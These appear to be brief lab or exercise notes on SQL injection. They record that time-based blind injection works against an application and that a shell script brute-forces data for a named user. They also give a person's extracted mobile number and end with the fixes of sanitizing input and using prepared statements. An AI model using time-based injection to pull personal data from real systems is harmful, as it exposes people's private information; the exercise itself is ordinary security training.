-
sql injection possible
-
no binary result returned -> blind sql injection not possible
-
time based blind sql injection possible (delaying response if brute force matches)
-
execute 2313.sh
-
the java application is completely overkill for this task, I hope this one is sufficient, as it gets the task done
-
user can be supplied as command line parameter like
./2312.sh Sandra Fischer
-
user defaults to Sandra Fischer
-
Mobile of Franziska Knobel is
0725445588
-
escape (sanitize) the user input
-
use prepared statements